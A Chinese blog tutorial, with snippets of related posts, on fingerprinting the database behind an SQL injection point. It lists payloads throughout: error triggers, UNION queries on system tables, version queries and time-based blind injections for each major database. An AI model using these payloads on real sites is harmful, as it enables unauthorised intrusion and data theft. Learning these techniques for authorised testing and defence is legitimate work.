SQL注入点判断数据库类型

已于 2025-04-11 23:10:14 修改
阅读量1.1k 收藏 17
点赞数 19
文章标签: 数据库 sql sql注入
于 2025-03-30 19:09:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/w2361734601/article/details/146770668
版权

目录

​1. 错误信息法

​2. 字符串连接符

​3. 注释语法

​4. 系统表查询

​5. 版本查询函数

​6. 时间盲注函数

​7. 数值函数测试

​8. 数据类型转换

​​9. 常用端口

​10. ​​网站开发语言

总结表

 

根据SQL注入点判断数据库类型通常可以通过以下方法实现,这些方法基于不同数据库系统的特性和语法差异:

1. 错误信息法

  • 原理:不同数据库的报错信息会包含特定的关键词。
  • 示例
    ' OR 1=1 --
    • MySQL:可能返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version...
    • Oracle:可能返回 ORA-00933: SQL command not properly ended
    • SQL Server:可能返回 Incorrect syntax near '--'.

2. 字符串连接符

  • 原理:不同数据库的字符串连接符不同。
  • 示例
    ' || 'abc' --
    • MySQL:默认不支持 ||(除非启用ANSI模式),需用 CONCAT()
    • Oracle/SQLite/PostgreSQL:支持 ||
    • SQL Server:使用 +(如 'abc' + 'def')。

3. 注释语法

  • 原理:不同数据库的注释符号可能不同。 
    ' -- (SQL Server、Oracle、PostgreSQL)
' # (MySQL)

4. 系统表查询

  • 原理:不同数据库的系统表名不同。
  • 示例
    UNION SELECT table_name FROM information_schema.tables -- (MySQL/PostgreSQL)
UNION SELECT table_name FROM all_tables -- (Oracle)
UNION SELECT name FROM sysobjects -- (SQL Server)

5. 版本查询函数

  • 原理:不同数据库的版本查询语句不同。
  • 示例
    UNION SELECT @@version -- (SQL Server/MySQL)
UNION SELECT version() -- (PostgreSQL)
SELECT banner FROM v$version -- (Oracle)

6. 时间盲注函数

  • 原理:不同数据库的延迟函数不同。
  • 示例
    '; WAITFOR DELAY '0:0:5' -- (SQL Server)
' OR SLEEP(5) -- (MySQL)
' OR pg_sleep(5) -- (PostgreSQL)
' OR DBMS_LOCK.SLEEP(5) -- (Oracle)

7. 数值函数测试

  • 原理:部分函数为某数据库独有。
  • 示例
    ' AND LEN('abc')=3 -- (SQL Server)
' AND LENGTH('abc')=3 -- (MySQL/PostgreSQL/Oracle)

8. 数据类型转换

  • 原理:不同数据库的隐式转换规则不同。
  • 示例
  • ' AND 1=CAST('1' AS INT) -- (SQL Server/PostgreSQL)
' AND 1=CAST('1' AS SIGNED) -- (MySQL)

​​9. 常用端口

  •  原理:不同数据库的常用端口不同。
  • 示例

    ​​MySQL​​:3306

    ​​Oracle​​​​:1521

    ​​SQL Server​​:1433

    ​​PostgreSQL​​​​:5432

    ​​Access​​:无独立端口,通过ODBC或文件共享访问

​10. ​​网站开发语言

  •  原理:不同数据库的常用网站开发语言不同。
  • 示例

​​MySQL​​:PHP、Python、Java(常见于LAMP/LNMP架构)

​​Oracle​​​​:Java、.NET(企业级应用常见)

​​SQL Server​​​​:ASP/.NET(微软技术栈)

​​PostgreSQL​​​​:Python、Ruby、Java(GIS、数据分析场景常见)

​​Access​​​​:ASP/ASPX(传统小型应用)

总结表

特征​​MySQL​​SQL Server​​Oracle​​PostgreSQL​
​字符串连接​CONCAT() 或 ``(ANSI模式)+
​注释符​# 或 --+------ 或 /* */
​版本查询函数​version() 或 @@version@@versionSELECT banner FROM v$versionversion()
​时间盲注函数​SLEEP(5) 或 BENCHMARK()WAITFOR DELAY '0:0:5'DBMS_LOCK.SLEEP(5)

pg_sleep(5)
​系统表/元数据​information_schema.TABLESsysobjectssys.user_tables 或 v$versionpg_catalog
​特有函数​IF()IIF()

TO_CHAR()CURRENT_DATE
​长度函数​LENGTH()LEN()LENGTH()LENGTH()
​端口​3306143315215432
​开发语言PHP/Python/JavaASP/.NETJava/.NETPython/Ruby/Java

 

通过结合上述方法,可以快速判断目标数据库类型,从而制定针对性的注入策略。注意实际测试时需谨慎,避免触发安全防护机制。

SQL注入类型判断
m0_56578216的博客
09-14 1565
第一关注入一个1’,错误回显出下面内容,其中1’是注入的内容,0,1后面的单引号和最前面的单引号是一对,剩下的两个单引号是一对,错误回显出上面内容说明是字符型注入注入一个id=2-1回显内容依然相同,说明这关的后端代码将2-1先进行算术运算后才接收,所以回显内容无变化,注入一个id=2-1回显内容改变,说明这关的后端代码将2-1当做字符串处理,才改变了回显内容,
sql注入mysql判断_SQL注入判断数据库类型
weixin_36116139的博客
01-30 2652
SQL注入首先会判断服务端数据库类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息0x00 常见网页类型对应数据库关系asp : Access/SQLServerphp : Mysqljsp : Oracle0x...
SQL注入中如何判断数据库类型
最新发布
weixin_52967270的博客
10-31 1211
的错误信息通常包含“syntax error”或“you have an error in your SQL syntax”。的错误信息可能包含“incorrect syntax near”或“unclosed quotation mark”。的错误信息通常包含“ERROR: syntax error at or near”。常用端口号,实战中使用,端口号可能会被被修改被隐藏。的错误信息可能包含“ORA-”开头的错误代码。使用浏览器插件,或扫描器,进行指纹识别。sqlmap -u ‘注入点网址’
mysql 判断类型_SQL注入判断数据库类型
weixin_33803878的博客
01-18 333
页面返回的报错信息判断默认端口判断Oracleport:1521SQL Serverport:1433MySQLport:3306数据库特有的数据表判断oracle数据库http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1mysql数据库(mysql版本在5.0以上)http:/...
SQL注入如何判断数据库类型
YJ_12340的博客
07-09 899
在进行SQL注入之前,首先应该判断数据库类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库类型选择合适的函数,更容易实现SQL注入
SQL注入数据库判断
ma963852的博客
04-14 4235
01 网站类型数据库的联系 asp:SQLServer,Access .net :SQLServer php:Mysql,PostgreSql java:Oracle,Mysql 可以根据网站类型来大概确定后续测试数据库的优先级。 02 依据主机端口 如果可以对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型。 Oracle 默认端口号:1521 SQL Server 默认端口号:1433 MySQL 默认端口号:3306 PostgreSql 默认端口号:54..
数据库-SQL 注入SQL 注入漏洞详解 - Union 注入
qq_31104067的博客
10-15 811
SQL 注入 即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1408
简要学习各种数据库注入特点: 数据库:Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access的数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
微软数据库SQL注入漏洞解析——Microsoft Access、SQLServer与SQL注入防御
CoffeMilk的博客
09-12 2350
一般进行SQL注入前,都需要对这些数据库所对应的程序寻找注入点,常见的SQL注入点一般存在于参数输入、输出的位置(如:注册登录、不同页码、参数内容的数据查询、不同页面切换、留言版等内容)。
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
利用 SQL 注入识别数据库方法总结
Flag少侠的博客
04-07 1705
识别数据库的最好方法在很大程度上取决于是否处于盲态。如果应用程序返回(至少在某种程度上)查询结果和(或)数据库服务器错误消息(例如,非盲态),那么跟踪会相当简单,因为可以很容易通过产生的输出结果来提供关于底层技术的信息。但如果处于盲态,无法让应用返回数据库服务器消息,那么就需要改变方法,尝试注入多种已知的、只针对特定技术才能执行的查询。通过判断这些查询中的哪一条被成功执行,获取目前面对的数据库服务器的精确信息。
SQL注入数据库类型判断
weixin_45718516的博客
02-04 1382
SQL注入数据库类型判断 前言 安服小白一枚,第一次发表文章,就当做是自己的笔记,如有错误还请各位大佬多多指教,小白不易,还请哥哥轻喷。 默认端口判断 MySQL:3306 MSSQL:1433 Oracle:1521 当然,除非是在内网做测试,否则一般情况下是不可能把这些端口映射出来的。 数据库特有连接符判断 id=1 and ‘1’+’1’=’11’ #MySQL或者是MSSQL id=1 and concat(‘1’,’1’)=’11’ #MySQL或者Oracle id=1 and ‘1’|
sql注入mysql判断_SQL注入通过函数来判断数据库类型
weixin_33733806的博客
01-19 349
SQL注入通过函数来判断数据库类型某日,发现一目标存在SQL注入,且过滤了select等相关敏感字段,用工具暂无法判断数据库类型。后发现调用某些SQL函数也可判断数据库类型,虽然SQL语句大部分是通用的。但一些内置的函数还是有一定的区别。len和length在mssql和mysql以及db2内,返回长度值是调用len()函数;在oracle和INFORMIX则是通过length()来返回长度值。换...
SQL注入数据库判断
孤的博客
04-03 3851
方法一: 用@@datadir查看数据库安装目录,能否判断出 方法二: 通过各个数据库特有的数据表来判断 1、mssql数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1 2、access数据库 http://127.0.0.1/test.php?id=1 and (s...
注入判断mysql数据库_注入判断数据库类型
weixin_42282699的博客
02-12 394
SQL注入-数据库判断国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQL占20%,其他的不足10%。常见的数据库Oracle、MySQLSQL Server、Access、MSsql、mongodb等关系型数据库通过外键关联来建立表与表之间的关系,非关系型数据库通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定.关系型数据库:由...
SQL注入判断数据库类型
weixin_51387754的博客
08-17 2791
在发现存在SQL注入后,就得首先判断是哪一种数据库。网上虽然也有如何判断数据库类型的相关文章,但是每一篇单独来讲都不全面。于是本文就分别总结了MySQL、MSSQL、Access、Oracle数据库判断方法,如果有什么遗漏或者错误的地方,请联系我更正(首次投稿,大佬轻喷)。 判断MySQL数据库 通过报错信息 you have an error in your SQL syntax,check the manual that corrsponds to your mysql server versi
SQL注入判断数据库类型
06-11
在进行 SQL 注入攻击时,需要先判断目标数据库类型,从而选择相应的攻击方式和 Payload。以下是一些常见的判断数据库类型的方法: 1. 基于错误信息:通过输入错误的 SQL 语句或者特定的字符(如 ' )来观察系统返回的错误信息,以此来推断目标数据库类型。 2. 基于时间延迟:通过输入一些需要时间延迟才能得到结果的 SQL 语句(如 sleep() 或者 benchmark() ),来观察系统的反应时间,从而推断目标数据库类型。 3. 基于注释字符:针对不同的数据库类型,其注释字符也不同。例如,MySQL 使用 -- 或者 # 来注释 SQL 语句,而 Oracle 使用 -- 或者 /* */ 来注释 SQL 语句。通过输入不同的注释字符,来观察系统的反应,从而推断目标数据库类型。 4. 基于关键字:通过输入一些特定的关键字,来观察系统的反应,从而推断目标数据库类型。例如,Oracle 使用 SELECT 1 FROM DUAL 来测试连接状态,而 MySQL 使用 SELECT 1 来测试连接状态。 需要注意的是,以上方法只是初步判断目标数据库类型的方法,如果要进一步确认数据库类型,可以使用一些专门的工具,例如 sqlmap、sqlninja 等。同时,应该采取防范措施,避免 SQL 注入攻击的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值